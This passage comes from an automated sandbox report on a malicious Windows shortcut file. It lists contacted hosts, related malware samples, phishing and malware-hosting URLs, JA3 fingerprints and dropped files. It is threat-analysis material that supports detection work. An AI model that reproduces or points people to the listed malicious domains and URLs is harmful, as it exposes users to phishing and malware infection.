203.101.184.118	pmo.gov.pk	Pakistan	9541	CYBERNET-APCyberInternetServicesPvtLtdPK	true
162.159.135.234	gateway.discord.gg	United States	13335	CLOUDFLARENETUS	false
188.114.97.3	ministryofficedownloadcloudserver.screenpont.xyz	European Union	13335	CLOUDFLARENETUS	true
239.255.255.250	unknown	Reserved	unknown	unknown	false
142.250.186.132	www.google.com	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.8
192.168.2.17
192.168.2.4
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1522859
Start date and time:	2024-09-30 18:57:14 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 20s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	jKSjtQ8W7O.lnk renamed because original name is a hash value
Original Sample Name:	ffb1e4d9253ed97cc381826993a8812ac6c53f7a7d01793e282fc148102bdab3.lnk
Detection:	MAL
Classification:	mal100.troj.evad.winLNK@26/23@17/9
EGA Information:	Successful, ratio: 50%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .lnk Override analysis time to 240s for powershell

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 66.102.1.84, 142.250.185.206, 216.58.212.131, 34.104.35.123, 184.28.90.27, 192.229.221.95, 93.184.221.240, 142.250.186.131, 142.250.184.238
Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, e16604.g.akamaiedge.net, update.googleapis.com, clients.l.google.com, prod.fs.microsoft.com.akadns.net
Execution Graph export aborted for target powershell.exe, PID 6588 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: jKSjtQ8W7O.lnk

Simulations

Behavior and APIs

Time	Type	Description
12:58:21	API Interceptor	13515692x Sleep call for process: powershell.exe modified
12:58:23	API Interceptor	2x Sleep call for process: svchost.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.97.3	Shipping Documents_pdf.exe	Get hash	malicious	FormBook	Browse	www.rtprajalojago.live/7vun/
	inject.exe	Get hash	malicious	RedLine, Xmrig	Browse	joxi.net/4Ak49WQH0GE3Nr.mp3
	http://meta.case-page-appeal.eu/community-standard/208273899187123/	Get hash	malicious	Unknown	Browse	meta.case-page-appeal.eu/assets/k9854w4e5136q5a-f2169603.png
	9q24V7OSys.exe	Get hash	malicious	FormBook	Browse	www.kzeconomy.top/bopi/?-Z_XO=6kwaqb6m5omublBEUG6Q6qPKP5yOZjcuHwr6+9T02/Tvpmf8nJuTPpmClij6fvBBwm3b&zxltAx=RdCtqlAhlNvlRVfP
	QUOTATION_SEPQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/mfctuvFf/download
	http://brawllstars.ru/	Get hash	malicious	HTMLPhisher	Browse	brawllstars.ru/
	http://aktiivasi-paylaterr.from-resmi.com/	Get hash	malicious	Unknown	Browse	aktiivasi-paylaterr.from-resmi.com/
	ECChG5eWfZ.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	homker11.uebki.one/GeneratorTest.php
	HpCQgSai4e.exe	Get hash	malicious	FormBook	Browse	www.zhxgtlw.top/bopi/?XtEdZRAP=tIrAt1o0vWdNGbj/SzADcCGpASEIYc8Vm+jYIgWXaQC1p/Id9tI9XA8Ni4J3RpZHG8N5&8p=DXgPYZ
	QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/Ky4pZ0WB/download
162.159.135.234	http://bafybeid2klgyiphng6ifws5s35aor57wfi3so6koe2w4ggoacn6gqghegm.ipfs.dweb.link/	Get hash	malicious	Unknown	Browse
	https://bafybeid655cmhe6uwb6wx3qrnokcfyddv63kcnzkm3whfn2xbjyyhukh2m.ipfs.dweb.link/	Get hash	malicious	Unknown	Browse
	http://via.evove.top	Get hash	malicious	Unknown	Browse
	test.exe	Get hash	malicious	Unknown	Browse
	windisc.exe	Get hash	malicious	Discord Token Stealer	Browse
	SecuriteInfo.com.Other.Malware-gen.12648.25881.elf	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Win32.TrojanX-gen.3459.12800.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Win64.SpywareX-gen.2363.7900.exe	Get hash	malicious	Unknown	Browse
	ChromeInstallerOnline.exe	Get hash	malicious	Dicrord Rat	Browse
	aBtQ4Tt70g.exe	Get hash	malicious	Dicrord Rat	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
gateway.discord.gg	https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/	Get hash	malicious	Unknown	Browse	162.159.136.234
	https://mjj.aigc369.com/	Get hash	malicious	Unknown	Browse	162.159.133.234
	http://relay.csgoze520.com/	Get hash	malicious	Unknown	Browse	162.159.136.234
	Client-built.bin.exe	Get hash	malicious	Discord Rat	Browse	162.159.130.234
	Client-built.bin.exe	Get hash	malicious	Discord Rat	Browse	162.159.133.234
	87Bym0x4Fy.exe	Get hash	malicious	Blank Grabber, DCRat, Discord Rat, PureLog Stealer, Xmrig, zgRAT	Browse	162.159.130.234
	Client-built.exe	Get hash	malicious	Discord Rat	Browse	162.159.134.234
	Client-built.exe	Get hash	malicious	Discord Rat	Browse	162.159.133.234
	QMGuBtu724.elf	Get hash	malicious	Unknown	Browse	162.159.133.234
	Client-built.exe	Get hash	malicious	Unknown	Browse	162.159.134.234

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	Sv6eQZzG0Z.lnk	Get hash	malicious	PureLog Stealer, zgRAT	Browse	162.159.135.234
	http://oiut-hbhgvgcvgcfcfcxbh.s3-website.us-east-2.amazonaws.com/	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	HdXeCzyZD9.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	188.114.96.3
	update SOA.exe	Get hash	malicious	FormBook	Browse	188.114.96.3
	NCTSgL4t0B.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	188.114.96.3
	4tXm5yPtiy.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	104.21.84.213
	https://mafanikiosacco-my.sharepoint.com/:f:/p/info/EgPH1s54501Ki8NU-gutZLABOsAyZ-dhIPJaM6vWEXJqUQ?e=PJpX12	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	UY9hUZn4CQ.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	104.21.1.169
	4sTTCruY06.exe	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	gh3zRWl4or.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	188.114.96.3
CLOUDFLARENETUS	http://oiut-hbhgvgcvgcfcfcxbh.s3-website.us-east-2.amazonaws.com/	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	HdXeCzyZD9.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	188.114.96.3
	update SOA.exe	Get hash	malicious	FormBook	Browse	188.114.96.3
	NCTSgL4t0B.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	188.114.96.3
	4tXm5yPtiy.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	104.21.84.213
	https://mafanikiosacco-my.sharepoint.com/:f:/p/info/EgPH1s54501Ki8NU-gutZLABOsAyZ-dhIPJaM6vWEXJqUQ?e=PJpX12	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	UY9hUZn4CQ.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	104.21.1.169
	4sTTCruY06.exe	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	gh3zRWl4or.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	188.114.96.3
	seoI30IZZr.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	188.114.96.3
CYBERNET-APCyberInternetServicesPvtLtdPK	firmware.i586.elf	Get hash	malicious	Unknown	Browse	124.29.195.152
	xd.arm7.elf	Get hash	malicious	Mirai	Browse	58.65.218.110
	LisectAVT_2403002B_136.dll	Get hash	malicious	Emotet	Browse	175.107.196.192
	RiI7W2cj7p.elf	Get hash	malicious	Unknown	Browse	175.107.255.200
	SHIPMENT-CMA CGM-1DBSIE1P-DOCX.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	72.255.53.7
	SHIPMENT-CMA CGM XIAMEN-1DBSIE1PL- EX1-DOCX.exe	Get hash	malicious	FormBook	Browse	72.255.53.7
	rCjg912Ssb.elf	Get hash	malicious	Mirai	Browse	103.213.114.223
	Scanned Documents.exe	Get hash	malicious	FormBook	Browse	72.255.53.7
	Newly Arrived Shipping Document.exe	Get hash	malicious	FormBook	Browse	72.255.53.7
	RECEIPT-CARGO-00098GHG-DOCX.exe	Get hash	malicious	FormBook	Browse	72.255.53.7

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
1138de370e523e824bbca92d049a3777	https://formacionadieste.com.de/Vrvz/	Get hash	malicious	HTMLPhisher	Browse	23.206.229.226
	https://vh.gskoffihoura.com/okta.vailhealth.org/oauth2/v1/authorize&client_id=okta-2b1959c8-bcc0-56eb	Get hash	malicious	Unknown	Browse	23.206.229.226
	https://timetraveltv.com/actions/cart_update.php?currency=GBP&return_url=https://blog.acelyaokcu.com/m/?c3Y9bzM2NV8xX29uZSZyYW5kPVdrcFNRMHM9JnVpZD1VU0VSMDkwOTIwMjRVMTIwOTA5MDE=N0123N%5BEMAIL	Get hash	malicious	Unknown	Browse	23.206.229.226
	https://ck.storematch.jp/bc?d=11044D9580EY4W1C2FD019VB3VD27BCW862C0351F9E0EA8-cdlaq4&B=a4f71fd1c235a114f94297e8a0a36c6e&sc_i=shp_pc_promo_mdRMBP_disp_mcad&rd=//interglobalcargoexpress.com/yuuuii#aW5mb0B2b3NzbG9oLmNvbQ==	Get hash	malicious	HTMLPhisher	Browse	23.206.229.226
	http://hrlaw.com.au	Get hash	malicious	Unknown	Browse	23.206.229.226
	Advisory23-UCDMS04-11-01.pdf.lnk	Get hash	malicious	Unknown	Browse	23.206.229.226
	https://wwvmicrosx.live/office365/office_cookies/main	Get hash	malicious	HTMLPhisher	Browse	23.206.229.226
	https://pokegamaclub.com/	Get hash	malicious	Unknown	Browse	23.206.229.226
	https://ole798.com/	Get hash	malicious	Unknown	Browse	23.206.229.226
	https://mukirecords.com/	Get hash	malicious	Unknown	Browse	23.206.229.226
28a2c9bd18a11de089ef85a160da29e4	Sv6eQZzG0Z.lnk	Get hash	malicious	PureLog Stealer, zgRAT	Browse	52.165.165.26
	https://mafanikiosacco-my.sharepoint.com/:f:/p/info/EgPH1s54501Ki8NU-gutZLABOsAyZ-dhIPJaM6vWEXJqUQ?e=PJpX12	Get hash	malicious	HTMLPhisher	Browse	52.165.165.26
	https://myworkspace183015a0ec.myclickfunnels.com/reviewdoc--96b32?preview=true	Get hash	malicious	Unknown	Browse	52.165.165.26
	http://servicesnaustraliagov.info/admin	Get hash	malicious	Unknown	Browse	52.165.165.26
	https://serrespec.weebly.com/tc2000-stock-charting-software.html	Get hash	malicious	Unknown	Browse	52.165.165.26
	https://formacionadieste.com.de/Vrvz/	Get hash	malicious	HTMLPhisher	Browse	52.165.165.26
	http://tr.padlet.com/redirect/?url=http://dctools.mooo.com/smileyes/dhe/succes/pure/dad/mom/kid/she/qwerty/careese.pfund@stcotterturbine.com	Get hash	malicious	HTMLPhisher	Browse	52.165.165.26
	https://vh.gskoffihoura.com/okta.vailhealth.org/oauth2/v1/authorize&client_id=okta-2b1959c8-bcc0-56eb	Get hash	malicious	Unknown	Browse	52.165.165.26
	Purchase Order IBT LPO-2320.eml	Get hash	malicious	Unknown	Browse	52.165.165.26
	https://timetraveltv.com/actions/cart_update.php?currency=GBP&return_url=https://blog.acelyaokcu.com/m/?c3Y9bzM2NV8xX29uZSZyYW5kPVdrcFNRMHM9JnVpZD1VU0VSMDkwOTIwMjRVMTIwOTA5MDE=N0123N%5BEMAIL	Get hash	malicious	Unknown	Browse	52.165.165.26
3b5074b1b5d032e5620f69f9f700ff0e	Sv6eQZzG0Z.lnk	Get hash	malicious	PureLog Stealer, zgRAT	Browse	188.114.97.3 162.159.135.234
	sostener.vbs	Get hash	malicious	AsyncRAT, DcRat	Browse	188.114.97.3 162.159.135.234
	0d145776475200f49119bfb3ac7ac4dd4e20fadd0fd7b.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	188.114.97.3 162.159.135.234
	https://formacionadieste.com.de/Vrvz/	Get hash	malicious	HTMLPhisher	Browse	188.114.97.3 162.159.135.234
	file.exe	Get hash	malicious	XWorm, Xmrig	Browse	188.114.97.3 162.159.135.234
	Purchase Order IBT LPO-2320.eml	Get hash	malicious	Unknown	Browse	188.114.97.3 162.159.135.234
	https://timetraveltv.com/actions/cart_update.php?currency=GBP&return_url=https://blog.acelyaokcu.com/m/?c3Y9bzM2NV8xX29uZSZyYW5kPVdrcFNRMHM9JnVpZD1VU0VSMDkwOTIwMjRVMTIwOTA5MDE=N0123N%5BEMAIL	Get hash	malicious	Unknown	Browse	188.114.97.3 162.159.135.234
	3140, EUR.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3 162.159.135.234
	UhkzPftQIt.exe	Get hash	malicious	ScreenConnect Tool	Browse	188.114.97.3 162.159.135.234
	7LC2izrr9u.exe	Get hash	malicious	ScreenConnect Tool	Browse	188.114.97.3 162.159.135.234

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.8304424878761655
Encrypted:	false
SSDEEP:	1536:RJszRK0I9i0k0I9wXq0I9UGJC/PQJCmJCovVsnQ9Sii1GY9zOoRXTpMNYpKhvUAA:RJE+Lfki1GjHwU/+vVhWqp+
MD5:	32463685792E2FE6E59ACD87798F2112
SHA1:	DFE9DF4EBDF2AA79C2A8A9CF0CE31E1A70FA67B4
SHA-256:	BFBDEBD5E7EC6B4BB8B7B1A37FAF9F9160DC9EAA2980315F13A54908BA5325DD
SHA-512:	EF171F47F1748653881C723D103174370E1966B22D0DD9EAF5E5CC59F2E099943AF3E9043721A457BF0D10554E9F680C55BD9B3499E9936E5D57CE65B8DE1F37
Malicious:	false
Reputation:	low
Preview:	..Q^........@..@.....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.....................................3~L.#.........`h.................h.......1.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x8352e665, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1048576
Entropy (8bit):	0.9433046920941188
Encrypted:	false
SSDEEP:	1536:bSB2ESB2SSjlK/ZvxPXK0I9XGJCTgzZYkr3g16zV2UPkLk+kY+lKuy9ny5zPOZ15:bazaHvxXy2V2UR
MD5:	E806AF514B0CEC9A55137DAAD459EA87
SHA1:	184FE0BFE1C2A055D0474677AEFD670BA967DF41
SHA-256:	69436385144EAFEF018BA110C5EEEE89D5F9633BBAC3782F881FD75EAAB97D32
SHA-512:	48018B7CE5ED0629A546A0C6578EABA2FE0BF23F72A19CF4DEBEBE05B81E34D450A6AC77D52B6B499ED639B6319C632C8E8CCFC67CD583F1DED9A040282F4E20
Malicious:	false
Reputation:	low
Preview:	.R.e... ...............X\...;...{......................0.x...... ...{s..:...\|..h.z.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............{...............................................................................................................................................................................................2...{.......................................:...\|...................<N..:...\|...........................#......h.z.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.08070612585527372
Encrypted:	false
SSDEEP:	3:jS/yYeKdV9Xgvll/nqlFcl1ZUllll44d7sC/qllGBnX/l/Tj/k7/t:jiyzcVcll/qlFclQ/le4dV2254
MD5:	02BC769436FB0EC8367C4411A355C6A6
SHA1:	29D385FDC5AB787F7860623BEB7CF5E34A9A103A
SHA-256:	B389A8E485F013A0E33DB868FD8D56639D710BAB9FF9BA0CD063F7052085146F
SHA-512:	6496442783B5971806F5D02FB69DC24AFE3B4D59B2286BE71C2A455D69CFB24ED9D25F8CE9A84686F15A85B406B3C68614637F18E7BB1C2A9D7E93B358742363
Malicious:	false
Reputation:	low
Preview:	.o,......................................;...{...:...\|... ...{s.......... ...{s.. ...{s.P.... ...{s..................<N..:...\|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	11608
Entropy (8bit):	4.890472898059848
Encrypted:	false
SSDEEP:	192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
MD5:	8A4B02D8A977CB929C05D4BC2942C5A9
SHA1:	F9A6426CAF2E8C64202E86B07F1A461056626BEA
SHA-256:	624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
SHA-512:	38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
Malicious:	false
Preview:	PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	3092
Entropy (8bit):	5.500265952464292
Encrypted:	false
SSDEEP:	96:xAzlHyIFKL2O9qrh7KCDpuTJ5Eo9AdrxQgP:a1yt2jrACluTLL2NP
MD5:	4AFF37FF69E58E0F335B93C3E04D1340
SHA1:	9389955E675540FEBC3491813EB946E10EA4EFCE
SHA-256:	21B4652587BE83B99B2065FB8DED25C8B8656505D40BF93F0328CCFAC12ABBEA
SHA-512:	569E252207D6537B9B4F3DD854BCC15FEA41A7D5B3F1690755B6179AD0B713D0F2A0B588FB4AABCBB4028BE62459AEDFA10F8D973C7B6101CCCF41F659E947B0
Malicious:	false
Preview:	@...e...........................................................H..............@-....f.J.\|.7h8..-.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.8.................C}...C....n..Bi.......Microsoft.CSharpP...............

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o0glsiur.w5e.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ojqp4zdh.ydb.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ttrrrczt.yxr.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xkqd1a1j.3am.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0WU5RS7E2LEYX4UPRJNW.temp

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	4601
Entropy (8bit):	3.789183730177295
Encrypted:	false
SSDEEP:	48:ySuP55ohDL16el1gSogZoaRjL16elegSogZoal1:yS65SZL16e1HnpL16e8Hnj
MD5:	0E1A6CFAD9FA713FA9D626EA9114B866
SHA1:	96C1ADF3D6754840AA3CCF0F41495ABC91DB1054
SHA-256:	14074F8BBFFD6E42CE4226FFF15F8CAD034D6FE4729FEA921F6F830317276E5D
SHA-512:	36E9AB75132E1F72B54CB5BBBC222A29C0398395C89A8E5191F7396D21345E2942CEC336A3FEA32EED6BAC11E2C056A67127BD0D63252BBAD0155708ADECC4E7
Malicious:	false
Preview:	...................................FL..................F. .. ...X.u.g....d..Y...X27.Y................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.........Yd.....0.g....d..Y.....j.2.....>YI. .JKSJTQ~1.LNK..N......EW.D>YI......$.....................>W.j.K.S.j.t.Q.8.W.7.O...l.n.k.......U...............-.......T..............y.....C:\Users\user\Desktop\jKSjtQ8W7O.lnk..9.%.P.r.o.g.r.a.m.F.i.l.e.s.(.x.8.6.).%.\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.`.......X.......632922...........hT..CrF.f4... ..C..Yc...,...E...hT..CrF.f4... ..C..Yc...,...E..........Y...1SPS.....Oh.....+'..=................R.u.n. .a.s. .A.d.m.i.n.i.s.t.r.a.t.o.r.........9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?...............................FL..................F.".. ...o1.Z....U$..f....."KW....@...........................P.O. .:i.....+00.../C:\...................V.1.....EW.D..Windows.@......OwH>YI.....3........................W.i.n.d.o.w.s.....Z.1.....>YF...Sy

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7cd4e7a7671bd03a.customDestinations-ms (copy)

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	4601
Entropy (8bit):	3.789183730177295
Encrypted:	false
SSDEEP:	48:ySuP55ohDL16el1gSogZoaRjL16elegSogZoal1:yS65SZL16e1HnpL16e8Hnj
MD5:	0E1A6CFAD9FA713FA9D626EA9114B866
SHA1:	96C1ADF3D6754840AA3CCF0F41495ABC91DB1054
SHA-256:	14074F8BBFFD6E42CE4226FFF15F8CAD034D6FE4729FEA921F6F830317276E5D
SHA-512:	36E9AB75132E1F72B54CB5BBBC222A29C0398395C89A8E5191F7396D21345E2942CEC336A3FEA32EED6BAC11E2C056A67127BD0D63252BBAD0155708ADECC4E7
Malicious:	false
Preview:	...................................FL..................F. .. ...X.u.g....d..Y...X27.Y................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.........Yd.....0.g....d..Y.....j.2.....>YI. .JKSJTQ~1.LNK..N......EW.D>YI......$.....................>W.j.K.S.j.t.Q.8.W.7.O...l.n.k.......U...............-.......T..............y.....C:\Users\user\Desktop\jKSjtQ8W7O.lnk..9.%.P.r.o.g.r.a.m.F.i.l.e.s.(.x.8.6.).%.\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.`.......X.......632922...........hT..CrF.f4... ..C..Yc...,...E...hT..CrF.f4... ..C..Yc...,...E..........Y...1SPS.....Oh.....+'..=................R.u.n. .a.s. .A.d.m.i.n.i.s.t.r.a.t.o.r.........9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?...............................FL..................F.".. ...o1.Z....U$..f....."KW....@...........................P.O. .:i.....+00.../C:\...................V.1.....EW.D..Windows.@......OwH>YI.....3........................W.i.n.d.o.w.s.....Z.1.....>YF...Sy

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Sep 30 15:58:26 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.9809392474467282
